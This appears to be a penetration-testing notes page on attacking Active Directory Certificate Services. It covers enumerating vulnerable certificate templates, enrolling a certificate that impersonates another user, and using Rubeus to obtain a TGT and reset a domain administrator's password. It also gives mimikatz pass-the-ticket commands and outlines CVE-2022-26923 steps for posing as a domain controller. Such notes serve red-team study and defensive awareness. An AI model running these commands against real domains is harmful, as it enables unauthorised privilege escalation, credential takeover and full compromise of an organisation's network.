3.7 KiB
Active Directory Certificate Service ADCS
-
Internal CA
-
PKI
-
File system encryption
-
Digital signatures
-
User authentication
-
Certificates will not be revoked after account password reset
Certificate Templates
- Extended/Enhanced Key Usage (EKU)
- Parameter combination can be exploited
- User Certificates may be requested from a member of a Domain User Group
- Machine Certifcates may be requested from a host of a Domain Computer Group
Enumeration
certutil -v -template > ct.txt
Exploitable templates should have the following traits:
Allow Enroll
orAllow Full Control
permissions to request certificate- Find groups by
net user <username> /domain
-->Domain Users
,Domain Computers
- Find groups by
- Client authentication EKU for Kerberos authentication -->
Client Authentication
- Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, -->
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
Certificate Creation
-
Win+R
-->mmc
-->File
-->Add/Remove Snap-in
-->Certificates
(Request Certificate if administration account --> Computer Account) -
After that in the main menu,
Certificates
--> right click onPersonal
-->All Tasks
-->Request Certificates
-->Next
-->Next
-->More information is required to enroll this certificate
-->Common Name
-->CN=concerto
&&User Principal Name
is the user to impersonate -->OK
--> selectUser Request
-->Enroll
-
After that in the main menu,
Personal
-->Certificates
--> The certificate -
Right click certificate -->
All Tasks
-->Export
-->Yes, export private key
-->PFX
--> setPassword
--> Save -
An alternative is certipy-ad
Impersonation
-
Request TGT with the created cert
-
Grab TGT
-
On the machine via
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
- Select a domain admin via opening
Active Directory Users and Computers
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
-
runas /user:<domain>\<username of DA> cmd.exe
-
Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
CVE-2022-26923
- Aims on abusing templates configuration, the Subject Alternative Name
SAN
. Set it to someone with higher permissions - User and Machine certificate templates
- User Principal Name is used for
SAN
, this template can not be modified in a way to escalate privileges - Computer accounts DNS name is used for
SAN
- Users of the Authenticated Users Group can create 10 Machine Certificates
- DNS hostname is used for authentication
- Service Principal Names (SPN), associates a service logon with a service instance. SPNs are unique
- Permissions of interest, all two are needed
- Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
- Validate write to SPN, update SPN of the AD object associated with the host
Usage
- User account has to be compromised, use it to enrol a new host on the domain
- Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
- Remove the SPN attribute to bypass the unique SPN
- With the default template request the machine cert
- authenticate via Kerberos with the template as the higher privileged machine